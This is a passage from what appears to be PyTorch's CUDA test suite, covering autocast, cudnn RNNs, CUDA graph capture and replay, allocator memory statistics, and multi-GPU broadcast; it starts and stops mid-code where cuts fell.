MyMM(torch.autograd.Function): @staticmethod @torch.cuda.amp.custom_fwd(cast_inputs=torch.float32) def forward(ctx, a, container, expect_type): b = container[1][0] self.assertTrue(a.dtype is expect_type) self.assertTrue(b.dtype is expect_type) self.assertFalse(torch.is_autocast_enabled()) ctx.save_for_backward(a, b) return a.mm(b) @staticmethod @torch.cuda.amp.custom_bwd def backward(ctx, grad): self.assertFalse(torch.is_autocast_enabled()) a, b = ctx.saved_tensors return grad.mm(b.t()), None, None mymm = MyMM.apply x = torch.randn((8, 8), device="cuda", dtype=torch.float16, requires_grad=True) # Puts one input tensor in a nested container. y's contained Tensor won't receive a gradient, # because torch.autograd.Function can't hand gradients back to non-Tensor forward arguments. # Sets requires_grad=False explicitly so we don't lie about expecting a gradient. y = (0, {0: torch.randn((8, 8), device="cuda", dtype=torch.float16, requires_grad=False)}) with torch.autocast('cuda', ): output = mymm(x, y, torch.float32) self.assertTrue(output.dtype is torch.float32) loss = output.sum() loss.backward() # Tests if custom_fwd becomes a no-op when mymm runs outside an autocast-enabled region. output = mymm(x, y, torch.float16) self.assertTrue(output.dtype is torch.float16) loss = output.sum() loss.backward() def test_autocast_cat_jit(self): # Reported at https://github.com/pytorch/pytorch/issues/38958 class Model(torch.nn.Module): def forward(self): a = torch.randn(1) b = torch.randn(1) c = torch.cat((a, b), 0) d = torch.stack([c, c], 0) return d # The JIT here doesn't really matter, we just need to call # cat via the boxed API model = Model() model_jit_script = torch.jit.script(model) with torch.autocast('cuda', enabled=True): model() model_jit_script() # cudnn RNNs require special backend handling (weights are cast to FP16 and reflattened) # so they get a dedicated test. # Despite the large number of RNN cases it tries, the test takes < 15 seconds on a Titan V (similar to V100). @skipIfRocm @unittest.skipIf(not TEST_CUDNN, 'CUDNN not available') def test_autocast_rnn(self): with torch.backends.cudnn.flags(enabled=True, deterministic=True): # seq, batch, features, hidden size clses = ("RNN", "GRU", "LSTM") T, B, F, H = 3, 4, 5, 6 dtypes = (torch.float16, torch.float32) input_layouts = ("seq_first", "batch_first", "packed") for (cls, num_layers, bias, input_layout, bidirectional, try_nonpreflattened_weights, input_dtype, hidden_dtype, weight_dtype) in \ product(clses, (1, 2), (True, False), input_layouts, (True, False), (True, False), dtypes, dtypes, dtypes): if input_layout == "seq_first": batch_first = False x = torch.randn((T, B, F), device="cuda", dtype=input_dtype) elif input_layout == "batch_first": batch_first = True x = torch.randn((B, T, F), device="cuda", dtype=input_dtype) elif input_layout == "packed": batch_first = False x = torch.randn((T, B, F), device="cuda", dtype=input_dtype) x = torch.nn.utils.rnn.pack_padded_sequence(torch.randn((T, B, F), device="cuda", dtype=input_dtype), lengths=(3, 2, 1, 3), enforce_sorted=False) rnn = getattr(torch.nn, cls)(F, H, num_layers=num_layers, bidirectional=bidirectional, bias=bias, batch_first=batch_first).cuda().to(dtype=weight_dtype) if try_nonpreflattened_weights: for p in rnn.parameters(): with torch.no_grad(): p.set_(p.clone()) h = torch.randn((num_layers * (2 if bidirectional else 1), B, H), device="cuda", dtype=hidden_dtype) if cls == "LSTM": c = torch.randn((num_layers * (2 if bidirectional else 1), B, H), device="cuda", dtype=hidden_dtype) h = (h, c) with torch.autocast('cuda', ): out, h_out = rnn(x, h) out = out.data if input_layout == "packed" else out self.assertEqual(out.dtype, torch.float16) # Autocast wrapper requires at::_cudnn_rnn is autograd-exposed. This check can't guarantee # at::_cudnn_rnn is autograd-exposed, but if it fires, it indicates some funny business has # occurred and we should double check that at::_cudnn_rnn remains autograd-exposed. self.assertEqual(out.grad_fn.name(), "CudnnRnnBackward0") out.sum().backward() grads = [p.grad.clone() for p in rnn.parameters()] rnn.zero_grad() if cls == "LSTM": out_control, h_out_control = rnn.to(dtype=torch.float16)(x.half(), (h[0].half(), h[1].half())) else: out_control, h_out_control = rnn.to(dtype=torch.float16)(x.half(), h.half()) out_control = out_control.data if input_layout == "packed" else out_control out_control.sum().backward() grads_control = [p.grad.clone() for p in rnn.parameters()] # Compares with default tolerances, even for FP16 execution. Barring nondeterminism, # autocast and control results should be bitwise identical. self.assertEqual(out, out_control) if cls == "LSTM": self.assertTrue(h_out[0].dtype is torch.float16 and h_out[1].dtype is torch.float16) self.assertEqual(h_out[0], h_out_control[0]) self.assertEqual(h_out[1], h_out_control[1]) else: self.assertEqual(h_out.dtype, torch.float16) self.assertEqual(h_out, h_out_control) for grad, grad_control in zip(grads, grads_control): self.assertEqual(grad.half(), grad_control) def test_autocast_cache_leak(self): # Reported at https://github.com/pytorch/pytorch/issues/48049 # Test is used to check, if autocast recaches the same parameters # when executed in a `torch.no_grad()` block. linear = torch.nn.Linear(10, 10).to('cuda') data = torch.randn(1, 10, device='cuda') with torch.autocast('cuda', ): with torch.no_grad(): out = linear(data) first_iter_mem = torch.cuda.memory_allocated() for _ in range(3): out = linear(data) self.assertTrue(first_iter_mem == torch.cuda.memory_allocated()) def test_autocast_checkpointing(self): model = torch.nn.Sequential(torch.nn.Linear(8, 8), torch.nn.Linear(8, 8), torch.nn.Linear(8, 8)).cuda() input = torch.rand((8, 8), device="cuda", dtype=torch.float16, requires_grad=True) with torch.autocast('cuda', ): output = checkpoint_sequential(model, 2, input) self.assertTrue(output.requires_grad) self.assertTrue(output.dtype is torch.float16) output.sum().backward() @slowTest @unittest.skipIf(not TEST_LARGE_TENSOR, "not enough memory") def test_max_large_axis(self): x = torch.zeros(2**32, device='cuda', dtype=torch.int8) x[-1] = 1 val, idx = x.max(0) self.assertEqual(val, 1) self.assertEqual(idx, x.shape[0] - 1) @unittest.skipIf(not TEST_NUMPY, "Numpy not found") def test_to_numpy(self): self.assertRaises(TypeError, lambda: torch.empty(1, device="cuda").numpy()) @unittest.skipIf((not TEST_CUDA) or TEST_WITH_ROCM or int(torch.version.cuda.split(".")[0]) < 11, "CUDA >= 11.0 required for graphs") def test_graph_capture_simple(self): s = torch.cuda.Stream() with torch.cuda.stream(s): a = torch.full((1000,), 1, device="cuda") g = torch.cuda.CUDAGraph() torch.cuda.empty_cache() g.capture_begin() b = a for _ in range(10): b = b + 1 g.capture_end() torch.cuda.current_stream().wait_stream(s) g.replay() self.assertTrue(b.sum().item() == 11000.) @unittest.skipIf((not TEST_CUDA) or TEST_WITH_ROCM or int(torch.version.cuda.split(".")[0]) < 11, "CUDA >= 11.0 required for graphs") def test_graph_rng_functional(self): ops_with_kwargs = ((torch.nn.functional.dropout, {"p": 0.1}), (torch.nn.functional.rrelu, {"training": True}),) size = 10000 def run(op, kwargs): a = torch.randn((size,), device="cuda", dtype=torch.float) # Control torch.cuda.manual_seed(5) eager_out = a for _ in range(6): eager_out = op(eager_out, **kwargs) graph_in = a.clone() stream = torch.cuda.Stream() stream.wait_stream(torch.cuda.current_stream()) with torch.cuda.stream(stream): torch.cuda.manual_seed(5) g = torch.cuda.CUDAGraph() torch.cuda.empty_cache() g.capture_begin() graph_out = graph_in for _ in range(2): graph_out = op(graph_out, **kwargs) g.capture_end() torch.cuda.current_stream().wait_stream(stream) # Runs a graphed->eager->graphed sequence of RNG ops. # replay() plays 2 invocations of the op, so the sequence has 6 # invocations total, matching Control. # replay() reads from graph_in and writes to graph_out. g.replay() out = op(graph_out, **kwargs) out = op(out, **kwargs) graph_in.copy_(out) g.replay() # If replay() updated RNG state correctly, graph_out # should now hold data equal to eager_out. try: self.assertEqual(eager_out, graph_out) except Exception as e: raise RuntimeError("Failed on ", op) from e # We hold references to all tensors used across streams up til this sync, # so no need to call record_stream on those tensors. torch.cuda.synchronize() for op, kwargs in ops_with_kwargs: run(op, kwargs) @unittest.skipIf((not TEST_CUDA) or TEST_WITH_ROCM or int(torch.version.cuda.split(".")[0]) < 11, "CUDA >= 11.0 required for graphs") def test_graph_rng_distributions(self): size = 10000 input = torch.rand((size,), device="cuda", dtype=torch.float) alloc = torch.empty((size,), device="cuda", dtype=torch.float) # Torch ops to test with sample args (tuple) and kwargs (dict) torch_with_args = (("bernoulli", (input.clone(),), {}), # multinomial uses some uncapturable CUDA calls. # TODO: reenable multinomial tests if/when the implementation is capturable. # ("multinomial", (input.clone(), size, True), {}), # ("multinomial", (input.clone(), size // 2, False), {}), # TODO: reenable normal test, where std is a device # tensor, when graph test failures are fixed # ("normal", (input.clone() + 1, input.clone()), {}), ("normal", (input.clone() + 1, 1.0), {}), ("poisson", (input.clone(),), {}), ("rand", (size,), {"device": "cuda", "dtype": torch.float}), ("randint", (0, 3, (size,)), {"device": "cuda", "dtype": torch.float}), ("randn", (size,), {"device": "cuda", "dtype": torch.float}),) # Tensor methods to test with sample args (tuple) tensor_with_args = (("bernoulli_", (input.clone(),)), ("cauchy_", ()), ("exponential_", ()), ("geometric_", (0.3,)), ("log_normal_", ()), ("normal_", ()), ("random_", ()), ("uniform_", ()),) def run(module, op, args, kwargs): torch.cuda.manual_seed(5) # Each path runs a dummy op to increment the state a bit before creating controls. if (module == "torch"): dummy = getattr(torch, op)(*args, **kwargs) control1 = getattr(torch, op)(*args, **kwargs) control2 = getattr(torch, op)(*args, **kwargs) else: dummy = alloc.clone() control1 = alloc.clone() control2 = alloc.clone() getattr(dummy, op)(*args) getattr(control1, op)(*args) getattr(control2, op)(*args) stream = torch.cuda.Stream() stream.wait_stream(torch.cuda.current_stream()) with torch.cuda.stream(stream): torch.cuda.manual_seed(5) g = torch.cuda.CUDAGraph() torch.cuda.empty_cache() if (module == "torch"): g.capture_begin() t1 = getattr(torch, op)(*args, **kwargs) t2 = getattr(torch, op)(*args, **kwargs) g.capture_end() else: t1 = alloc.clone() t2 = alloc.clone() g.capture_begin() getattr(t1, op)(*args) getattr(t2, op)(*args) g.capture_end() torch.cuda.current_stream().wait_stream(stream) try: self.assertNotEqual(control1, t1) self.assertNotEqual(control2, t2) except Exception as e: raise RuntimeError("Failed on " + module + "." + op) from e # Runs a dummy op prelude, as for controls, to make sure replay() # picks up the dummy op's state increment. if module == "torch": dummy = getattr(torch, op)(*args, **kwargs) else: dummy = alloc.clone() getattr(dummy, op)(*args) # Runs RNG ops that fill t1 and t2. g.replay() try: self.assertEqual(control1, t1) self.assertEqual(control2, t2) except Exception as e: raise RuntimeError("Failed on " + module + "." + op) from e # We hold references to all tensors used across streams up til this sync, # so no need to call record_stream on those tensors. torch.cuda.synchronize() for op_with_args in torch_with_args: run("torch", *op_with_args) for meth_with_args in tensor_with_args: # Adds an empty dict for kwargs, which none of the Tensor methods use run("Tensor", *(meth_with_args + ({},))) @unittest.skipIf((not TEST_CUDA) or TEST_WITH_ROCM or int(torch.version.cuda.split(".")[0]) < 11, "CUDA >= 11.0 required for graphs") def test_graph_two_successive(self): torch.cuda.empty_cache() size = 1000 kSmallBuffer = 2097152 def func_with_temps(t, val): x = t.clone() + val y = t.clone() + val return x + y s = torch.cuda.Stream() for share_mem in ("Don't share", "via pool()", "via graph_pool_handle()"): g0 = torch.cuda.CUDAGraph() g1 = torch.cuda.CUDAGraph() a = torch.ones((size,), device="cuda") s.wait_stream(torch.cuda.current_stream()) with torch.cuda.stream(s): g0_args = (torch.cuda.graph_pool_handle(),) if share_mem == "via graph_pool_handle()" else () g0.capture_begin(*g0_args) b = a.clone() for _ in range(5): b = func_with_temps(b, 1) g0.capture_end() g1_args = (g0.pool(),) if share_mem == "via pool()" else g0_args g1.capture_begin(*g1_args) for _ in range(5): b = func_with_temps(b, 1) g1.capture_end() torch.cuda.current_stream().wait_stream(s) # mixes unrelated eager ops with replays c = a.clone() for _ in range(2): c = func_with_temps(c, 3) g0.replay() for _ in range(2): c = func_with_temps(c, 3) g1.replay() for _ in range(2): c = func_with_temps(c, 3) self.assertEqual(b.sum().item(), size * 3070) self.assertEqual(c.sum().item(), size * 442) if share_mem != "Don't share": self.assertEqual(reserved_no_sharing - torch.cuda.memory_stats()["reserved_bytes.all.current"], kSmallBuffer) else: reserved_no_sharing = torch.cuda.memory_stats()["reserved_bytes.all.current"] del a, b, c, g0, g1 # Tensors used across streams (a and b) were held until just now, so no need to call record_stream on them. torch.cuda.synchronize() torch.cuda.empty_cache() @unittest.skip("Temporarily disabled due to a graphs bug in libcuda.so, " + "see https://github.com/pytorch/pytorch/pull/57556") @unittest.skipIf((not TEST_CUDA) or TEST_WITH_ROCM or int(torch.version.cuda.split(".")[0]) < 11, "CUDA >= 11.0 required for graphs") def test_graph_concurrent_replay(self): torch.cuda.empty_cache() size = 1000000 # largeish to help expose race conditions def func_with_temps(t, val): x = t.clone() + val y = t.clone() + val return x + y s = torch.cuda.Stream() for share_mem in ("Don't share", "via pool()", "via graph_pool_handle()"): g0 = torch.cuda.CUDAGraph() g1 = torch.cuda.CUDAGraph() s0 = torch.cuda.Stream() s1 = torch.cuda.Stream() a = torch.ones((size,), device="cuda") s.wait_stream(torch.cuda.current_stream()) with torch.cuda.stream(s): g0_args = (torch.cuda.graph_pool_handle(),) if share_mem == "via graph_pool_handle()" else () g0.capture_begin(*g0_args) b = a.clone() for _ in range(5): b = func_with_temps(b, 1) g0.capture_end() g1_args = (g0.pool(),) if share_mem == "via pool()" else g0_args g1.capture_begin(*g1_args) c = a.clone() for _ in range(5): c = func_with_temps(c, 2) g1.capture_end() # To reproduce data corruption, I need g0 and g1's kernels to run concurrently. # But replay() (especially cudaGraphLaunch) can incur significant CPU overhead. # The following pattern helps align device-side execution of g0 and g1's kernels. torch.cuda.synchronize() with torch.cuda.stream(s0): torch.cuda._sleep(1000000) s1.wait_stream(s0) g0.replay() with torch.cuda.stream(s1): g1.replay() torch.cuda.current_stream().wait_stream(s0) torch.cuda.current_stream().wait_stream(s1) if share_mem != "Don't share": # Confirms concurrent replays using the same mempool corrupted each other. self.assertNotEqual(b.sum().item(), size * 94) self.assertNotEqual(c.sum().item(), size * 156) else: # Confirms concurrent replays using different mempools did not corrupt each other. self.assertEqual(b.sum().item(), size * 94) self.assertEqual(c.sum().item(), size * 156) del a, b, c, g0, g1 # Tensors used across streams (a, b, c) were held until just now, so no need to call record_stream on them. torch.cuda.synchronize() torch.cuda.empty_cache() @unittest.skipIf((not TEST_CUDA) or TEST_WITH_ROCM or int(torch.version.cuda.split(".")[0]) < 11, "CUDA >= 11.0 required for graphs") def test_graph_three_successive(self): torch.cuda.empty_cache() size = 1000 s = torch.cuda.Stream() for share_mem in ("Don't share", "via pool()", "via graph_pool_handle()"): a = torch.ones((size,), device="cuda") g0 = torch.cuda.CUDAGraph() g1 = torch.cuda.CUDAGraph() g2 = torch.cuda.CUDAGraph() s.wait_stream(torch.cuda.current_stream()) with torch.cuda.stream(s): g0_args = (torch.cuda.graph_pool_handle(),) if share_mem == "via graph_pool_handle()" else () g0.capture_begin(*g0_args) b = a.clone() c = b + 1 d = b + 2 g0.capture_end() args = (g0.pool(),) if share_mem == "via pool()" else g0_args g1.capture_begin(*args) e = c + 3 del c g1.capture_end() g2.capture_begin(*args) f = d + 4 g2.capture_end() torch.cuda.current_stream().wait_stream(s) # Tests that replaying in capture order is valid g0.replay() g1.replay() g2.replay() self.assertEqual(e.sum().item(), size * 5) self.assertEqual(f.sum().item(), size * 7) # Tests that replaying as g0, g2, g1 is only valid if they don't share a pool g0.replay() g2.replay() g1.replay() # If share_mem is True, g2's capture should have reused c's memory for f. We replayed g2 then g1, # so we expect g1's captured "e = c + 3" mistakenly filled e with "f's vals + 3". self.assertEqual(e.sum().item(), size * (7 + 3) if share_mem != "Don't share" else size * 5) self.assertEqual(f.sum().item(), size * 7) del a, b, d, e, f, g0, g1, g2 # Tensors used across streams (a, e, f) were held until just now, so no need to call record_stream on them. torch.cuda.synchronize() torch.cuda.empty_cache() @unittest.skipIf((not TEST_CUDA) or TEST_WITH_ROCM or int(torch.version.cuda.split(".")[0]) < 11, "CUDA >= 11.0 required for graphs") def test_graph_memory_stats_and_use_result_after_destroy_graph(self): kSmallSize = 1048576 kSmallBuffer = 2097152 kLargeBuffer = 20971520 kMinLargeAlloc = 10485760 kRoundLarge = 2097152 elem = 4 # this was annoying to write but stresses the expectations pretty rigorously cases = ((512 // elem, 1, kSmallBuffer, kSmallBuffer, "small_pool"), (kSmallSize // elem, 2, 2 * kSmallBuffer, kSmallBuffer, "small_pool"), ((kSmallSize + 512) // elem, 1, kLargeBuffer, kLargeBuffer, "large_pool"), ((kMinLargeAlloc - 512) // elem, 2, 2 * kLargeBuffer, kLargeBuffer, "large_pool"), ((kMinLargeAlloc + 512) // elem, 3, 3 * (kRoundLarge * ((kMinLargeAlloc + 512 + kRoundLarge - 1) // kRoundLarge)), kRoundLarge * ((kMinLargeAlloc + 512 + kRoundLarge - 1) // kRoundLarge), "large_pool"),) stats_to_check = ("segment.", "reserved_bytes.", "active.", "active_bytes.") gc.collect() torch.cuda.empty_cache() s = torch.cuda.Stream() for (numel, delta_cudaMallocs, delta_cudaMalloc_bytes, delta_cudaMalloc_bytes_post_del_g, pool_string) in cases: if pool_string == "small_pool": delta_active_blocks = 2 # one from "b" plus a sneaky one from CUDAGraph's one-element rng offset holder delta_active_bytes = numel * elem + 512 # + 512 for CUDAGraph's rng offset holder else: delta_active_blocks = 1 # We only check the large pool, which isn't affected by rng offset holder delta_active_bytes = numel * elem g = torch.cuda.CUDAGraph() s.wait_stream(torch.cuda.current_stream()) with torch.cuda.stream(s): # Allocation stat estimates assume input is created on the same stream as capture_begin() # (in other words, the same stream silo as the rng offset holder, which is not allocated from the # capture's private pool). a = torch.ones((numel,), device="cuda") precapture_stats = torch.cuda.memory_stats() g.capture_begin() b = a.clone() for _ in range(5): b = b.clone() + 1 g.capture_end() torch.cuda.current_stream().wait_stream(s) gc.collect() postcapture_stats = torch.cuda.memory_stats() expecteds = (delta_cudaMallocs, delta_cudaMalloc_bytes, delta_active_blocks, delta_active_bytes) # Double checks replay and stats before and after a call to empty_cache for i in range(2): for stat, expected in zip(stats_to_check, expecteds): stat = stat + pool_string + ".current" current = postcapture_stats[stat] - precapture_stats[stat] self.assertEqual(current, expected, "Pre to post capture delta of " + stat + " = {}, expected = {}, numel = {}".format(current, expected, numel)) g.replay() self.assertEqual(b.sum().item(), 6 * numel) if i == 0: torch.cuda.empty_cache() del g gc.collect() torch.cuda.empty_cache() postdel_stats = torch.cuda.memory_stats() # Uses graph result b after graph has been deleted self.assertEqual(b.sum().item(), 6 * numel) # b should be the only live reference remaining from the graph's private pool expecteds = (1, delta_cudaMalloc_bytes_post_del_g, 1, numel * elem) for stat, expected in zip(stats_to_check, expecteds): stat = stat + pool_string + ".current" current = postdel_stats[stat] - precapture_stats[stat] self.assertEqual(current, expected, "Pre capture to post graph delete delta of " + stat + " = {}, expected = {}, numel = {}".format(current, expected, numel)) # del a, b before the next case is essential, otherwise overwriting a and b in the next case # can throw off its allocation/deallocation counts. del a, b # Tensors used across streams (a and b) were held until just now, so no need to call record_stream on them. torch.cuda.synchronize() torch.cuda.empty_cache() @unittest.skipIf((not TEST_CUDA) or TEST_WITH_ROCM or int(torch.version.cuda.split(".")[0]) < 11, "CUDA >= 11.0 required for graphs") def test_graph_record_stream(self): # Makes sure graph capture defers attempting to reclaim allocations used across streams. See # "Q. Why skip process_events if a capture might be underway?" in c10/cuda/CUDACachingAllocator.cpp torch.cuda.empty_cache() potential_problem = torch.zeros((3,), device="cuda") a = torch.zeros((3,), device="cuda") s0 = torch.cuda.Stream() s1 = torch.cuda.Stream() s2 = torch.cuda.Stream() g = torch.cuda.CUDAGraph() torch.cuda.synchronize() with torch.cuda.stream(s0): potential_problem.record_stream(s0) torch.cuda._sleep(TestCuda.FIFTY_MIL_CYCLES) potential_problem.fill_(1.) del potential_problem with torch.cuda.stream(s1): g.capture_begin() # potential_problem's allocation should still be outstanding. if DeviceCachingAllocator::malloc # mistakenly calls process_events, it will trigger cudaEventQueries on potential_problem's end-of-life # event, which will cause the capture to error. b = a.clone() # Let's also see what happens if we record_stream on a tensor during capture. s2.wait_stream(s1) with torch.cuda.stream(s2): b.fill_(1.) b.record_stream(s2) # dummy record_stream del b s1.wait_stream(s2) g.capture_end() torch.cuda.synchronize() # dummy allocation triggers process_events, Hopefully successfully processes b's end-of-life event. c = torch.zeros((3,), device="cuda") @unittest.skipIf((not TEST_CUDA) or TEST_WITH_ROCM or int(torch.version.cuda.split(".")[0]) < 11, "CUDA >= 11.0 required for graphs") # If this test is the first in the process to try cudnn rnns with dropout, it'll initialize # DropoutState's long-lived internal buffer. Calling code perceives this (correct) behavior # as a memory leak unless we skip the leak check. @skipCUDAMemoryLeakCheckIf(True) def test_graph_cudnn_dropout(self): # Tests the interaction of cuda graph capture with DropoutState's syncs in ATen/native/cudnn/RNN.cpp. # In particular, if user runs a sequence of captured and noncaptured cudnn rnns, DropoutState should # avoid syncing noncapturing streams with captured events or vice versa. torch.cuda.empty_cache() model = torch.nn.LSTM(512, 512, 2, dropout=0.5).cuda() x = torch.ones(100, 192, 512, device="cuda") y = model(x) g = torch.cuda.CUDAGraph() s = torch.cuda.Stream() s.wait_stream(torch.cuda.current_stream()) with torch.cuda.stream(s): g.capture_begin() y = model(x) g.capture_end() torch.cuda.current_stream().wait_stream(s) y = model(x) @unittest.skipIf((not TEST_CUDA) or TEST_WITH_ROCM or int(torch.version.cuda.split(".")[0]) < 11, "CUDA >= 11.0 required for graphs") def test_graph_grad_scaling(self): torch.cuda.empty_cache() scaler = torch.cuda.amp.GradScaler(init_scale=4.) g = torch.cuda.CUDAGraph() s = torch.cuda.Stream() weight = torch.ones((100,), device="cuda", requires_grad=True) opt = torch.optim.SGD([weight], lr=0.1) static_input = torch.ones_like(weight) static_grad = torch.ones_like(weight) # warmup s = torch.cuda.Stream() s.wait_stream(torch.cuda.current_stream()) with torch.cuda.stream(s): loss = (weight.half() * static_input).sum() scaler.scale(loss).backward() torch.cuda.current_stream().wait_stream(s) opt.zero_grad(set_to_none=True) # capture with torch.cuda.graph(g): loss = (weight.half() * static_input).sum() scaler.scale(loss).backward() input_vals = [5, 20000, 5, 40000] # If the scale gets updated properly, these are the scale, growth tracker, # and grad values we expect. expected_scales = [4, 2, 2, 1] expected_growth_trackers = [1, 0, 1, 0] expected_grad_vals = [5 * 4, float("inf"), 5 * 2, float("inf")] for data, scale, growth_tracker, grad_val in zip(input_vals, expected_scales, expected_growth_trackers, expected_grad_vals): static_input.fill_(data) g.replay() self.assertEqual(weight.grad, torch.full_like(weight.grad, grad_val)) scaler.step(opt) scaler.update() self.assertEqual(scaler._scale, scale) self.assertEqual(scaler._growth_tracker, growth_tracker) @unittest.skipIf((not TEST_CUDA) or TEST_WITH_ROCM or int(torch.version.cuda.split(".")[0]) < 11, "CUDA >= 11.0 required for graphs") def test_graph_make_graphed_callables(self): torch.manual_seed(5) torch.cuda.manual_seed(5) N, D_in, H, D_out = 640, 4096, 2048, 1024 models = [] for _ in range(2): model_section1 = torch.nn.Sequential(torch.nn.Linear(D_in, H), torch.nn.Dropout(p=0.1)).cuda() model_section2 = torch.nn.Sequential(torch.nn.Linear(H, D_out), torch.nn.Dropout(p=0.2)).cuda() models.append(torch.nn.Sequential(model_section1, model_section2)) model_graphed = models[0] model_control = models[1] model_graphed.load_state_dict(model_control.state_dict()) opt_graphed = torch.optim.SGD(model_graphed.parameters(), lr=0.1) opt_control = torch.optim.SGD(model_control.parameters(), lr=0.1) x = torch.randn(N, D_in, device='cuda') h = torch.randn(N, H, device='cuda', requires_grad=True) y_pred = torch.randn(N, D_out, device='cuda', requires_grad=True) y = torch.randn(N, D_out, device='cuda') loss_fn_control = torch.nn.functional.mse_loss relu_control = torch.nn.functional.relu # This is a good stress test. It graphs four callables: two Modules and two python functions. model_graphed[0], model_graphed[1], relu_graphed, loss_fn_graphed = \ torch.cuda.make_graphed_callables((model_graphed[0], model_graphed[1], relu_control, loss_fn_control), ((x,), (h,), (y_pred,), (y_pred, y))) real_inputs = [torch.rand_like(x) for _ in range(10)] real_targets = [torch.rand_like(y) for _ in range(10)] for m, opt, relu, loss_fn in zip((model_graphed, model_control), (opt_graphed, opt_control), (relu_graphed, relu_control), (loss_fn_graphed, loss_fn_control)): # Resets RNC states before iterations for graphed and ungraphed models, # so dropout math should be bitwise identical for both. torch.manual_seed(5) torch.cuda.manual_seed(5) for data, target in zip(real_inputs, real_targets): opt.zero_grad(set_to_none=True) y_pred = m(data) y_pred = relu(y_pred) loss = loss_fn(y_pred, target) loss.backward() opt.step() for p, pc in zip(model_graphed.parameters(), model_control.parameters()): self.assertEqual(p, pc) # We graphed the models in training mode. Eval should still run ungraphed. model_graphed.eval() model_control.eval() self.assertEqual(model_graphed(real_inputs[0]), model_control(real_inputs[0])) def test_batch_norm_gather_stats(self): input = torch.randn(1, 3, 3, 3, device='cuda') mean, invstd = torch.batch_norm_gather_stats( input, mean=torch.ones(2, 3, device='cuda'), invstd=torch.ones(2, 3, device='cuda'), running_mean=None, running_var=None , momentum=.1, eps=1e-5, count=2 ) self.assertEqual(mean, torch.ones(3, device='cuda')) self.assertEqual(invstd, torch.ones(3, device='cuda')) @unittest.skipIf(not TEST_MULTIGPU, "Test needs multiple GPUs") def test_cuda_device_memory_allocated(self): from torch.cuda import memory_allocated device_count = torch.cuda.device_count() current_alloc = [memory_allocated(idx) for idx in range(device_count)] x = torch.ones(10, device="cuda:0") self.assertTrue(memory_allocated(0) > current_alloc[0]) self.assertTrue(all(memory_allocated(torch.cuda.device(idx)) == current_alloc[idx] for idx in range(1, device_count))) def test_matmul_memory_use(self): def get_max_used(): torch.cuda.synchronize() val = torch.cuda.max_memory_allocated() torch.cuda.reset_peak_memory_stats() return val a = torch.rand(1, 32, 32, device="cuda") b = torch.rand(24, 32, 1, device="cuda") get_max_used() torch.matmul(a, b) matmul_mem = get_max_used() a = a.expand(24, 32, 32) torch.matmul(a, b) matmul_expand_mem = get_max_used() torch.bmm(a, b) bmm_mem = get_max_used() self.assertEqual(matmul_expand_mem, matmul_mem) self.assertEqual(bmm_mem, matmul_mem) class TestCudaComm(TestCase): def _test_broadcast(self, input): if not TEST_MULTIGPU: raise unittest.SkipTest("only one GPU detected") # test regular results = comm.broadcast(input, (0, 1)) for i, t in enumerate(results): self.assertEqual(t.get_device(), i) self.assertEqual(t, input) if input.is_cuda and input.get_device() == i: # test not copying on same device self.assertEqual(t.data_ptr(), input.data_ptr()) # test out= for inplace in [True, False]: if inplace: outputs = [torch.empty_like(input, device=0), torch.empty_like(input, device=1)] else: outputs = [input.cuda(0), torch.empty_like(input, device=1)] results = comm.broadcast(input, out=outputs) for r, o in zip(results, outputs): self.assertIs(r, o) for i, t in enumerate(results): self.assertEqual(t.get_device(), i) self.assertEqual(t, input) # test error msg with self.assertRaisesRegex(RuntimeError, r"Exactly one of 'devices' and 'out'"): comm.broadcast(input, (0, 1), out=outputs) with self.assertRaisesRegex(RuntimeError, r"Expected all output tensors to be CUDA tensors, but output tensor at index 1"): comm.broadcast(input, out=[input.cuda(0), input.cpu()]) with self.assertRaisesRegex(RuntimeError, r"Expected all output tensors to have same shape as the source .+ at index 1"): comm.broadcast(input, out=[input.cuda(0), input.cuda(1).unsqueeze(0)]) def test_broadcast_cpu(self): self._test_broadcast(torch.randn(5, 5)) def test_broadcast_gpu(self): self._test_broadcast(torch.randn(5, 5).cuda()) def _test_broadcast_coalesced(self, tensors, buffer_size): b_tensors = [comm.broadcast(t, (0, 1)) for t in tensors] for (_, bt), t in zip(b_tensors, tensors): self.assertEqual(bt.get_device(), 1) self.assertEqual(bt, t) self.assertIsInstance(bt, type(t)) bc_tensors = comm.broadcast_coalesced(tensors, (0, 1), buffer_size=buffer_size) bc_tensors_t = list(zip(*bc_tensors)) self.assertEqual(b_tensors, bc_tensors_t) for (_, bt), (_, bct) in zip(b_tensors, bc_tensors_t): self.assertEqual(bt.get_device(), bct.get_device()) self.assertIsInstance(bct, type(bt)) # check that tensors on device[0] are returned as-is for out_tensors in (b_tensors, bc_tensors_t): for inp_t, (out_t, _) in zip(tensors, out_tensors): self.assertIs(inp_t, out_t) # check that the tensors not on device[0] have different version counters # NOTE [ Version Counter in comm.*_coalesced ] versions = [t._version for _, t in bc_tensors_t] for old_version, (_, t) in zip(versions, bc_tensors_t): self.assertEqual(t._version, old_version) t.zero_() self.assertEqual(t._version, old_version + 1) @unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected") # Note: fails sometimes on the CI, passes on dual gfx906 def test_broadcast_coalesced(self): numel = 5 num_bytes = numel * 8 tensors = [ make_sparse_tensor(torch.cuda.sparse.DoubleTensor, 1, 2, 3), torch.randn(numel).long().cuda(), torch.randn(numel).cuda(), make_sparse_tensor(torch.cuda.sparse.DoubleTensor, 10, 2, 3), make_sparse_tensor(torch.cuda.sparse.DoubleTensor, 5, 2, 3), make_sparse_tensor(torch.cuda.sparse.LongTensor, 7, 3, 3), make_sparse_tensor(torch.cuda.sparse.FloatTensor, 2, 2, 3), torch.randn(numel).long().cuda(), torch.randn(numel).long().cuda(), make_sparse_tensor(torch.cuda.sparse.LongTensor, 3, 2, 7), torch.randn(numel * 2).int().cuda(), # int is 2x shorter torch.randn(numel).cuda(), ] self._test_broadcast_coalesced(tensors, num_bytes * 5 // 2) @unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected") def test_broadcast_coalesced_dense_only(self): numel = 5 num_bytes = numel * 8 tensors = [ torch.randn(numel).long().cuda(), torch.randn(numel).cuda(), torch.randn(numel).long().cuda(), torch.randn(numel).long().cuda(), torch.randn(numel * 2).int().cuda(), # int is 2x shorter torch.randn(numel).cuda(), ] self._test_broadcast_coalesced(tensors, num_bytes * 5 // 2) @unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected") def test_broadcast_coalesced_empty_tensors(self): tensors = [ torch.tensor([]).byte().cuda(), torch.randn(5).cuda(), torch.randn(5).double().cuda() ] self._test_broadcast_coalesced(tensors, 256) @unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected") def test_reduce_add(self): x = 